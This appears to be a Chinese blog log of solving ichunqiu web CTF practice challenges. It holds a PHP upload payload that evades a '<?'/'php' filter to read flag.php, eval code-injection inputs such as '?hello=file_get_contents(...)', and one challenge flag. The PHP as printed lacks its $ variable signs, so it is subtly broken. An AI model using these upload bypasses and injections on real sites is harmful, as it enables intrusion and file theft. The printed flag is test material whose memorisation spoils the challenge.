2018-11-22WEB题记录

2018-11-24  本文已影响0人  Cardinal2376

题目链接https://www.ichunqiu.com/battalion
选择CTF训练,全部题库,Web分类,从通过人数排序
第一题:Misc Web 爆破-1
php代码,要求给一个6位变量
大佬题解:直接GLOBALS看所有变量就可以了
$$a提示超变量GLOBALS有效

第二题:Web Upload
提示是flag在flag.php里
直接打开发现可以看到一句here_is_flag,但是没有flag(后来知道是写在注释里了)
上传的文件在/u/xxx.xxx里
后来知道这是可以运行代码的,尝试直接上传php代码
<?php
fh=fopen('../flag.php','r'); echo fread(fh,filesize("../flag.php"));
fclose(fh); ?> 发现过滤了<?和php关键字 用script标签和大写PHP过滤,文件后缀 <script language="PHP">fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread(fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符,开始还用+号来连接,搞错了。 fclose(fh);
</script>
成功得到注释中的flag

第三题:Web 爆破-2
源码审计,eval( "var_dump($a);");
可以执行代码,两种方法
1)?hello=file_get_contents('flag.php')
2)?hello=file("flag.php")
3)?hello=);echo%20cat%20flag.php + ctrl + u 查看源码 (我没试出来)
flag{9bc5fa0c-37ab-4b1c-8ac0-3de6c2fed8f7}

第四题:SQL注入
sqlmap报错,不知道为什么

上一篇下一篇

猜你喜欢

热点阅读